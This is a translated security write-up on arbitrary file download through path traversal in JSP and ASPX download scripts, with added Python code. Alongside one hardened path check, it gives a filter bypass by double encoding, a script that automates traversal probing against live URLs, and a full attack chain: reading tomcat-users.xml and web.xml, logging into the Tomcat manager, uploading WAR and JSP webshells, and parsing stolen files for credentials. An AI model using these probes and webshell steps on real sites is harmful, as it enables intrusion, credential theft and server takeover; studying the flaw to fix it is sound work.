Any file download Vulnerability JSP site

Source: Internet
Author: User

Where it appears:

Web sites commonly offer a file download feature. The usual design is a dynamic page (PHP, JSP, ASPX, ASP and so on) that takes the file to be downloaded as a parameter, typically named filename, e.g. .php?filename= or .jsp?filename=. The page builds the absolute path of the file on the server from the value of filename, reads the file, and streams it straight to the client. A typical implementation looks like this (JSP; other languages follow the same pattern):
<%@ page contentType="application/octet-stream" %>
<%@ page import="java.util.*,java.io.*,java.net.*" %>
<%
    response.setContentType("application/unknown");
    // File name comes straight from the URL parameter; the container has already
    // URL-decoded it once, and it is decoded a second time here. No validation.
    String filename = URLDecoder.decode(request.getParameter("FileName"), "UTF-8");
    String filename2 = filename;
    // Absolute path: the fixed upload directory with the untrusted name glued on
    File file = new File("/home/zzang/www/jsphome/jm/thesisupload/" + filename);
    byte b[] = new byte[(int) file.length()];
    // Send whatever was resolved straight back to the client as an attachment
    response.setHeader("Content-Disposition", "attachment;filename=" + filename2 + ";");
    if (file.isFile()) {
        BufferedInputStream fin = new BufferedInputStream(new FileInputStream(file));
        BufferedOutputStream outs = new BufferedOutputStream(response.getOutputStream());
        int read = 0;
        while ((read = fin.read(b)) != -1) {
            outs.write(b, 0, read);
        }
        outs.close();
        fin.close();
    }
%>
This code does deliver the requested file, but the filename parameter is used without any filtering, so a client who supplies path traversal sequences (../) can download any file the web server process is allowed to read: an arbitrary file download vulnerability. Note also that the parameter is URL-decoded a second time by URLDecoder.decode() after the servlet container has already decoded it once, so any filter applied to the raw parameter before that call can be bypassed with double-encoded sequences such as %252e%252e%252f, which reach the File constructor as ../.
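The path resolution the JSP performs, the kind of blacklist that is usually bolted onto it, and the containment check that actually stops traversal, modelled in Python as an added example (not code from the original article). The upload directory is the one hard-coded above; the parameter values are constructed. The same check in Java is File.getCanonicalPath() compared against the canonical base directory before the file is opened.

```python
import os
from urllib.parse import unquote_plus

# The upload directory hard-coded in the JSP above
UPLOAD_DIR = "/home/zzang/www/jsphome/jm/thesisupload"


def vulnerable_path(filename_param):
    """What the JSP ends up opening. The servlet container has already
    URL-decoded the parameter once; URLDecoder.decode() decodes it again
    (unquote_plus mirrors that: %xx and '+' are both translated). The result
    is glued onto UPLOAD_DIR and the OS, not the code, resolves any '..'."""
    decoded = unquote_plus(filename_param)
    return os.path.normpath(UPLOAD_DIR + "/" + decoded)


def blacklist_passes(filename_param):
    """A filter applied to the raw parameter *before* the second decode.
    Its '..' check never sees the dots hidden in %2e%2e, so a
    double-encoded traversal string slips straight through."""
    return ".." not in filename_param and not filename_param.startswith("/")


def safe_path(filename_param):
    """Hardened resolution: decode, then require the canonical path to sit
    strictly inside UPLOAD_DIR. Returns the path to open, or None to reject."""
    decoded = unquote_plus(filename_param)
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    base = os.path.realpath(UPLOAD_DIR)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # commonpath rather than startswith: a plain prefix test would accept
    # /.../thesisupload_old/x as lying under /.../thesisupload
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```

With this in place aa/../2006101884105_Reply.doc still resolves to the real file (which is exactly why that probe is harmless to the site and useful to the tester), while ../../../../../../etc/passwd and its %2e%2e-encoded form are rejected after decoding rather than before.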

Test method:

1. Insert aa/../ into the path and see whether the file still downloads (this shows whether traversal sequences are resolved and identifies the script and directory).

Original link:
Http://edu.test.net/test/student_demo/Question_DownLoad.php?filename=2006101884105_Reply.doc
Modified:
Http://edu.test.net/test/student_demo/Question_DownLoad.php?filename=aa/../2006101884105_Reply.doc
If both requests return the same file, continue testing.

2. Determine whether arbitrary files can be downloaded.

Modify the request to:
http://edu.test.net/test/student_demo/Question_DownLoad.php?filename=test/student_demo/Question_DownLoad.php
This tries to download the source code of the download script itself. If the response says the file does not exist, the script is resolving the name relative to a fixed directory and an arbitrary file download is likely: keep prepending ../ to the path until the file is returned. If the response instead complains that the file type is wrong, the script is checking extensions and this may not be an arbitrary file download vulnerability.
The request that finally succeeds:
http://edu.test.net/test/student_demo/Question_DownLoad.php?filename=../../../test/student_demo/Question_DownLoad.php

Exploitation process

Whatever the site, the first step in exploiting this vulnerability is to locate the root directory of the web site, so that is described first.
Step one: determine the site root. The files offered for download usually sit in a sub-folder of the site, and the number of nested folders varies, so path traversal (../) is used to find how many levels up the web root is.
For example, a download point:
Http://www.test.com.cn/DownLoad.aspx?fileName=%C4%EA%B6%C8%C9%F3%BA%CB%B1%ED.doc

The file downloads normally.
DownLoad.aspx sits in the site root, so try to download it:
Http://www.test.com.cn/DownLoad.aspx?fileName=download.aspx
Error.

Use traversal (../) to find the site root:
Http://www.test.com.cn/DownLoad.aspx?fileName=../download.aspx
Fails.
Http://www.test.com.cn/DownLoad.aspx?fileName=../../download.aspx

The download succeeds, so the download directory is two levels below the web root (on Windows/IIS file names are case-insensitive, which is why download.aspx matches DownLoad.aspx). Open the file and check its contents:

The downloaded file is indeed the download script itself.
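The probing sequence from the test method (aa/../ check, then prepending ../ until the download script's own source comes back) and the root-directory step above, as an added example that is not the article's own code. The target is simulated offline: a constructed file map and a fake_fetch that resolves names the way the vulnerable script does. http_fetch gives the same interface over real HTTP against a hypothetical target URL; it is defined but not called here.

```python
import posixpath

# Constructed stand-in for the target, modelled on the edu.test.net example:
# a web root, the download script's fixed directory, and the script path.
WEB_ROOT = "/var/www/html"
DOWNLOAD_DIR = WEB_ROOT + "/test/student_demo/upload"
SCRIPT_PATH = "test/student_demo/Question_DownLoad.php"   # relative to the web root

# Constructed server file system: absolute path -> content
FAKE_FS = {
    DOWNLOAD_DIR + "/2006101884105_Reply.doc": b"PK\x03\x04 constructed .doc bytes",
    WEB_ROOT + "/" + SCRIPT_PATH:
        b"<?php\n$f = $_GET['filename'];\nreadfile('upload/' . $f);\n",
}


def fake_fetch(filename_param):
    """Behaves like the vulnerable script: glue the parameter onto
    DOWNLOAD_DIR, let the OS resolve '..', return (status, body)."""
    resolved = posixpath.normpath(DOWNLOAD_DIR + "/" + filename_param)
    if resolved in FAKE_FS:
        return 200, FAKE_FS[resolved]
    return 404, b"file does not exist"


def http_fetch(base_url):
    """Fetch callable for a live target. base_url ends at the parameter, e.g.
    'http://edu.test.net/test/student_demo/Question_DownLoad.php?filename='."""
    import urllib.error
    import urllib.parse
    import urllib.request

    def fetch(filename_param):
        url = base_url + urllib.parse.quote(filename_param, safe="/")
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()
    return fetch


def traversal_works(fetch, known_file):
    """Step 1: does aa/../known_file return exactly the bytes of known_file?"""
    s1, b1 = fetch(known_file)
    s2, b2 = fetch("aa/../" + known_file)
    return s1 == 200 and s2 == 200 and b1 == b2


def find_web_root_depth(fetch, script_rel_path, max_depth=10):
    """Step 2: prepend ../ until the download script's own source is served.
    Returns how many ../ were needed (the download directory's depth below
    the web root), or None if no depth up to max_depth worked."""
    for depth in range(max_depth + 1):
        status, body = fetch("../" * depth + script_rel_path)
        # Source of a dynamic page starts with its script marker, not with
        # document bytes; that distinguishes a real hit from a decoy file.
        if status == 200 and body.lstrip().startswith((b"<?php", b"<%")):
            return depth
    return None
```

Against the constructed target the depth comes back as 3, matching the ../../../ in the final request of the test method; every later request (web.xml, other sites' configuration files) is then built from that depth.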

Exploitation differs somewhat between site types, so they are described separately:

1. JSP site
This section covers two simple approaches: downloading the Tomcat configuration file, and downloading the web site's own source code.
1) A download point on a JSP site:
http://www.test.cn/down.jsp?filename=%D5%D0%B1%EA%CF%EE%C4%BF%C9%EA%C7%EB1.doc&path=C:/Program%20Files/Apache%20software%20foundation/tomcat%206.0/webapps/ztbwz/upload/%d5%d0%b1%ea%cf%ee%c4%bf%c9%ea%c7%eb1.doc
The download point takes two parameters that refer to the same file; path is clearly the absolute path of the file on the server, so no traversal is even needed. More importantly, the path shows that the site is deployed under the Tomcat installation directory (webapps/), which means Tomcat's manager/html application may be reachable directly.
Request: Http://www.test.cn/manager/html

The application is reachable and prompts for a user name and password.
So the next step is to download the Tomcat configuration file tomcat-users.xml, which stores the login user names and passwords.
What you need to know about the Tomcat layout: tomcat-users.xml lives in the conf directory of the installation, so it can be fetched directly through the download point.
Construct the URL:
Http://www.test.cn/down.jsp?filename=tomcat-users.xml&path=C:/Program%20Files/Apache%20Software%20foundation/tomcat%206.0/conf/tomcat-users.xml
Download successful:

Open the file to get the user name and password.

Log in.

Success.

Then upload a WAR file through the manager to obtain a webshell, completing a simple test.

2) Downloading the source code of the site itself
Download point: Http://test.edu.cn/file.do?method=downFile&fileName=20080505094144.doc
Test: http://test.edu.cn/manager/html is not accessible,

so the method above fails.
First download the web application's own configuration file, WEB-INF/web.xml under the application root (it is usually long, and sometimes contains key information such as database connection user names and passwords).
Access:
Http://test/file.do?method=downFile&fileName=. /web-inf/web.xml

Open it after download; the key content:

The back end uses the FCKeditor editor, which has many vulnerabilities, so use the editor's upload path directly:
Http://test//admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=image&connector=connectors/jsp/connector

Choose a JSP shell and upload it directly: a webshell, with no restrictions.

System privileges; penetration complete.
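Triage of the two configuration files the write-up downloads (tomcat-users.xml in 1) above and WEB-INF/web.xml here), as an added example that is not the article's own code: which accounts in tomcat-users.xml can reach the manager application, and which parameters and servlets in web.xml are worth reading before going further. Both XML documents are constructed samples, modelled on a default Tomcat 6 tomcat-users.xml and on a web.xml that registers the FCKeditor JSP connector; every value in them is invented.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml (values invented)
TOMCAT_USERS_XML = b"""<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
  <role rolename="manager"/>
  <role rolename="tomcat"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
  <user username="admin" password="s3cret" roles="tomcat,manager"/>
</tomcat-users>
"""

# Constructed sample web.xml (values invented), namespaced like a real one
WEB_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <context-param><param-name>jdbc.url</param-name>
    <param-value>jdbc:mysql://127.0.0.1:3306/site</param-value></context-param>
  <context-param><param-name>jdbc.user</param-name><param-value>siteuser</param-value></context-param>
  <context-param><param-name>jdbc.password</param-name><param-value>P@ssw0rd</param-value></context-param>
  <servlet>
    <servlet-name>Connector</servlet-name>
    <servlet-class>com.fredck.FCKeditor.connector.ConnectorServlet</servlet-class>
    <init-param><param-name>baseDir</param-name><param-value>/UserFiles/</param-value></init-param>
    <init-param><param-name>enabled</param-name><param-value>true</param-value></init-param>
  </servlet>
  <servlet-mapping>
    <servlet-name>Connector</servlet-name>
    <url-pattern>/admin/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Roles that open the manager application. Tomcat 6.0.30 and later (and 7+)
# split the single "manager" role into manager-gui/-script/-jmx/-status;
# earlier 6.0.x releases used plain "manager".
MANAGER_ROLES = {"manager", "manager-gui", "manager-script"}
SECRET_HINTS = ("password", "passwd", "pwd", "secret", "jdbc")


def _local(tag):
    """Strip an XML namespace: '{http://...}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def _child_text(el, name):
    for child in el:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def manager_accounts(xml_bytes):
    """Users in tomcat-users.xml whose roles reach /manager/html:
    a list of (username, password, sorted roles)."""
    found = []
    for el in ET.fromstring(xml_bytes).iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if roles & MANAGER_ROLES:
            found.append((el.get("username"), el.get("password"), sorted(roles)))
    return found


def web_xml_findings(xml_bytes):
    """Triage web.xml into (credential-looking params, servlets with class
    and URL patterns); the latter is how an upload connector is located."""
    root = ET.fromstring(xml_bytes)
    secrets, servlets = {}, {}
    for el in root.iter():
        name = _local(el.tag)
        if name in ("context-param", "init-param"):
            pname = _child_text(el, "param-name") or ""
            if any(h in pname.lower() for h in SECRET_HINTS):
                secrets[pname] = _child_text(el, "param-value")
        elif name == "servlet":
            servlets[_child_text(el, "servlet-name")] = {
                "class": _child_text(el, "servlet-class"), "patterns": []}
    for el in root.iter():
        if _local(el.tag) == "servlet-mapping":
            sname = _child_text(el, "servlet-name")
            if sname in servlets:
                servlets[sname]["patterns"].append(_child_text(el, "url-pattern"))
    return secrets, servlets
```

On the sample, only the admin account carries a manager role, and the servlet-mapping gives the exact connector URL to put in the browser.html request; a connector servlet whose enabled init-param is true is the one worth trying.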

